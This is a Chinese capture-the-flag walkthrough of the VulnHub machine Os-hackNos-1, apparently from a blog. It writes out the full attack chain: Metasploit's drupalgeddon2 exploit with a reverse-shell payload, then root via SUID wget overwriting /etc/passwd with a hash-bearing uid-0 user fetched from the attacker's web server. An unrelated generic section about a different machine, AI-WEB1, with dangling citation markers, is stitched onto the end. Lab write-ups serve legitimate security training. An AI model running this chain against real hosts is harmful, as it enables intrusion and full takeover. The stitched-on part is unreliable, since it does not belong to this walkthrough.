vulnhub靶机 Os-hackNos-1

下载靶机

地址:hackNos: Os-hackNos ~ VulnHub

问题阐述

本次使用的vitualbox虚拟机,因为用vmware打开镜像有问题,kali扫描不到靶机ip,按照网上方法进入编辑页面也失败了,最后看到网上说virtual打开没问题,但我用virtualbox导入镜像,用kali也就没扫到,最后尝试把kali和Os-hackNos-1都使用桥接模式,最后成功扫描到靶机

打靶目标

,官网任务是获得2个flag,可理解为获取靶机的root权限

打靶过程

1.查看kaliIP

ifconfig

2.nmap扫描存活主机

nmap -sP -sn -v 192.168.0.0/24

 3.对存活主机进行端口扫描

nmap -v -A -PN 172.20.10.9

 80端口用于HTTP服务,直接访问网站做web渗透

4.打开网站,发现是apache默认界面

直接做目录扫描,发现drupal

dirb http://172.20.10.9

 5.访问http://172.20.10.9/drupal,并发现版本信息drupal7

 6.msf搜索漏洞,并进行漏洞利用

msfconsole

msf6>search drupal

 利用exploit/unix/webapp/drupal_drupalgeddon2

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.20.10.9
rhost => 172.20.10.9
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
targeturi => /drupal
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

 7.进行信息搜集,web权限,之后进行提权

提权

转换为交互式shell

shell

which python  //未发现python就寻找python3

which python3

python3 -c 'import pty; pty.spawn("/bin/bash")'

 查看哪些命令是root权限的

find / -perm -u=s -type f 2>/dev/null

 发现wget,于是可以通过wget重写/etc/passwd文件,来创建新的root用户

在kali上生成密码
perl -le 'print crypt("123456","addedsalt")'

 将 test:adrla7IBSfTZQ:0:0:test:/root:/bin/bash 写入到passwd 文件中

在kali上使用python搭建一个web服务器

python3 -m http.server 9999

最后使用wget命令远程下载替换

wget http://172.20.10.10:9999/passwd -O /etc/passwd

 至此输入 su test 再输入密码,发现为root权限

### 关于VulnHub靶机AI-WEB1的信息 针对VulnHub平台上的AI-WEB1靶机,该虚拟机旨在提供给有兴趣了解Web应用程序安全性的个人一种实践环境。通过这一挑战,参与者可以探索常见的Web应用漏洞以及如何利用这些弱点来获得系统的进一步访问权限。 #### 初始侦察阶段 在开始任何实际攻击之前,进行全面的情报搜集至关重要。这通常涉及到使用诸如`Nmap`这样的工具来进行端口扫描和服务版本检测: ```bash nmap -A <target_IP> ``` 上述命令能够揭示开放的服务及其潜在的安全配置缺陷[^3]。 #### Web服务器枚举 一旦确认目标运行着HTTP(S)服务,则应立即启动目录遍历尝试。可借助像`Dirb`或更现代的选择如`Gobuster`等工具完成这项工作: ```bash gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` 此过程有助于发现隐藏页面和管理接口,它们可能是后续入侵的关键入口点。 #### 应用层挖掘 对于基于PHP构建的应用程序来说,源码泄露是一个常见问题。如果运气好,在上一步找到的路径里可能会存在`.php~`或其他临时文件形式暴露出来的代码片段。仔细审查这部分内容往往能带来意想不到的收获——比如硬编码凭证或是调试模式下的敏感信息泄漏。 #### 数据库交互测试 许多老旧CMS(内容管理系统)容易受到SQL注入的影响。当遇到带有查询参数的URL时,不妨试试经典的单引号闭合技巧;而对于表单提交,则可通过修改POST数据包中的字段名与值组合来进行试探性输入验证绕过[^8]。 #### 提升权限方法 成功突破前端防护之后,下一步便是考虑怎样扩大战果直至取得root shell。Linux系统下,检查SUID位设置不当的二进制文件是一项基本技能;而Windows环境中则需留意计划任务、注册表键值异常变动等情况。 #### Drupal特定注意事项 鉴于部分描述提及到Drupal CMS, 若确实如此的话,值得注意的是有关于此框架内核升级机制的一个已知特性:即管理员账户密码可以通过编辑数据库记录的方式实现重置而不依赖原有认证流程[^9]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉城木槿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值